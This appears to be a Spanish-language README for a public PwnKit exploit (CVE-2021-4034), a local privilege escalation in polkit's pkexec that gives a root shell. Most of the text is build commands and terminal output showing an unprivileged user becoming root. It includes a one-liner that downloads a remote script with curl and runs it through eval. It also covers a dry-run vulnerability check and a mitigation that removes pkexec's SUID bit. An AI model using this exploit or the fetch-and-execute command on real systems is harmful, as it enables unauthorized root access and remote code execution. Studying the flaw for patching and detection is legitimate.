
CVE-2021-4034 1day
Un exploit de escalada de privilegios de polkit de un día
Simplemente ejecuta make, ./cve-2021-4034 y disfruta de tu shell de root.
El aviso original de los autores reales está aquí
Si el exploit funciona, obtendrás un shell de root inmediatamente:
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
Actualizar polkit en la mayoría de los sistemas parcheará el exploit, por lo tanto, obtendrás la ayuda de uso y el programa saldrá:
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
Para no ejecutar un shell sino solo probar si el sistema es vulnerable, compila el objetivo dry-run.
Si el programa termina imprimiendo "root", significa que tu sistema es vulnerable al exploit.
vagrant@ubuntu-impish:~/CVE-2021-4034$ make dry-run
...
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
root
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
1
Si tu sistema no es vulnerable, imprime un error y sale.
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
0
Polkit (anteriormente PolicyKit) es un componente para controlar privilegios a nivel de sistema en sistemas operativos tipo Unix. Proporciona una forma organizada para que procesos no privilegiados se comuniquen con procesos privilegiados. También es posible usar polkit para ejecutar comandos con privilegios elevados mediante el comando pkexec seguido del comando que se desea ejecutar (con permiso de root).
Puedes explotar fácilmente el sistema usando un solo script, descargable y ejecutable con este comando:
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
Si no hay parches disponibles para tu sistema operativo, puedes eliminar el bit SUID de pkexec como mitigación temporal.
# chmod 0755 /usr/bin/pkexec
El exploit entonces fallará quejándose de que pkexec debe tener el bit setuid habilitado.
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ sudo chmod 0755 /usr/bin/pkexec
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ ./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root